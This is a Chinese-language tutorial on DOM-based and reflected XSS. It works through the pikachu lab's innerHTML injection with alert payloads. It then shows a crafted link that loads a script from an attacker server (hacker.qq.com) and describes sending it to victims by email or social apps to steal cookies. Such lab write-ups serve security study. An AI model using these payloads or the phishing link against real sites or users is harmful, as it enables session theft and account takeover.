Dom型xss的理解和反射型xss实战操作
Dom型xss类似于反射型xss,但是不同点在于DOM 型的 XSS 主要是由客户端的js脚本通过 DOM 动态地输出数据到页面上,它不依赖于提交数据到服务器,而是从客户端获得DOM中的数据在本地执行。容易导致 DOM 型的 XSS 的输入源包括:Document.URL、Location(.pathname|.href|.search|.hash)、Document.referrer、Window.name、Document.cookie、localStorage/globalStorage
这里以pikachu的靶场为例:
<script>
function domxss(){
var str = document.getElementById("text").value;
document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
}
//试试:'><img src="#" οnmοuseοver="alert('xss')">
//试试:' οnclick="alert('xss')">,闭合掉就行
</script>
对于这段js脚本中,str是我们输入框中输入的文本内容, document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";这段代码通过getelementbyid方法拼接了一个a标签作为<div id="dom">节点内的内容(用innerHTML实现),因此便可以构造闭合语句,闭合a标签,达到效果。
payload:' οnclick=alert('xss') '
思考如何通过反射型或者dom型xss在实战中能够达到效果?毕竟这两种类型都是在前端执行,不同于存储型xss会经过后端,存在于数据库中?
反射性XSS一般是攻击者通过特定手法(如电子邮件),诱使用户去访问一个包含恶意代码的URL,当受害者点击这些专门设计链接的时候,恶意代码会直接在受害主机上的浏览器上执行,反射型XSS通常出现在网站搜索栏,用户登入口等地方,常用来窃取客户端或进行钓鱼欺骗。
考虑一种场景,若是我们通过测试判定一个网站存在xss,那么可以利用这个存在xss的点进行写入xss链接,类似于<a href="http://xsstest.qq.com/search.php?q=%3Cscript+src%3Dhttp%3A%2F%2Fhacker.qq.com%2Fhacker.js%3E%3C%2Fscript%3E&commend=all&ssid=s5-e&search_type=item&atype=&filterFineness=&rr=1&pcat=food2011&style=grid&cat=">点击就送998</a> 这样的一个链接,通过某种方式(社工)发送给用户,比如邮箱,社交软件等欺骗用户点击链接,那么就会触发q=... 后面的网址并访问,hacker.qq.com(hack的服务器),并执行写好的js代码,用户在不知情的情况下在该网站上进行操作,登录注册等,此时在hack端完全可以使用监控用户,得到cookie等信息(后续就可以使用beef搞了)。
Dom型xss的理解和反射型xss实战操作相关推荐
- DVWA 之 XSS(Reflected)反射型XSS
目录 1.级别:Low 2.级别:Medium 3.级别:High 4.级别:Impossible 反射型XSS攻击 又称为非持久性跨站点脚本攻击,它是最常见的类型的XSS.漏洞产生的原因是攻击者注入 ...
- 【网络攻防】“跨站脚本攻击“ 第一弹 ——反射型XSS
撰稿|谢泳 编辑|王聪丽 信息收集|谢泳 目录 1. 初识XSS 2. 反射型XSS 2.1 Cookie劫持 2.2 Get请求 2.3 Post请求 3. 防御方式 1. 初识XSS 跨站脚本攻击 ...
- 【XSS技巧拓展】————15、Chrome 是怎么过滤反射型 XSS 的呢?
XSS,即跨站脚本攻击,是Web程序中常见的漏洞,其原理是恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入其中的Script代码会自动执行,从而达到恶意攻击用户的目的.为了防 ...
- 如何防止通过url攻击_什么是XSS攻击?如何防御XSS攻击?
大家上午好,大家经常听到XSS攻击这个词,那么XSS攻击到底是什么,以及如何防御大家清楚么?今天,小墨就给大家讲一下:XSS攻击的定义.类型以及防御方法.什么是XSS攻击? XSS攻击全称跨站脚本攻击 ...
- XSS攻击,XSS预防(前端安全),XSS练习
XSS攻击,XSS预防(前端安全),XSS练习 文章目录 XSS攻击,XSS预防(前端安全),XSS练习 1:什么是XSS 2:XSS 分类 2.1:存储型 XSS 2.2:反射型 XSS 2.3:D ...
- XSS注入(1)-两个简单测试理解反射型xss注入和存储型xss注入
XSS注入(1)-两个例子理解反射型xss注入和存储型xss注入 XSS全称 Cross Site Script,为使与css语言重名,所以我们将其称为xss跨站脚本攻击.它指的是恶意攻击者往Web页 ...
- 反射型xss和Dom型xss区别
我们观察这个url 说明会向服务端发送一个请求,只是服务器直接进行返回了所以说反射型的xss是一次性的 不是持久存储 我们可以利用这个漏洞在url里面加入自己的脚本 例如这个网站用户已经登录了,我们可 ...
- 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一.跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发 ...
- 网络安全:DOM型XSS
前言:继<XSS漏洞> 前一篇中解释了什么是反射型XSS,然后有了一个问题,反射型XSS有什么用呢?只是用来自娱自乐,别人又看不到. emmm,其实不尽然也. 举个例子: <form ...
最新文章
- 欧洲AI规范先行,值得肯定与借鉴 --- 我看欧盟发布AI道德规范
- CentOS Firewall防火墙设置规则
- 全卷积神经网络( FCN ):语义分割深度模型先驱
- 短视频未来3年的规模为3万亿元
- UOJ#310.【UNR #2】黎明前的巧克力(FWT)
- Log4j MDC Tomcat下报异常org.apache.log4j.helpers.ThreadLocalMap
- 【ArcGIS风暴】在ArcGIS中实现将一个圆16等分
- centos 卸载软件_Linux服务器运维必备技能 软件包和启动项超详细整理
- 小记 | 从 0 到 1,看我如何玩弄千万日志于股掌
- ROS仿真-记一次错误 gazebo-2 process has died exit code 2
- druid最大连接数oracle,性能超过DRUID的最强数据库连接池——HikariCP相关配置及简单示例...
- Python入门:ChainMap 有效管理多个上下文
- php navigator,微信小程序组件:navigator页面链接解读和分析
- Uniswap 24h交易量约11.2亿美元涨23.91%
- linux运行jps五行结果,Linux系统性能监控
- mysql innodb数据库引擎_mysql的innodb数据库引擎详解
- Android系统 ——高通平台刷机流程(qfil)
- itools苹果录屏大师_超级录屏大师苹果版下载-超级录屏大师APP
- office2016 Excel每次打开都需要配置的问题解决
- 数据分析思维(极客时间)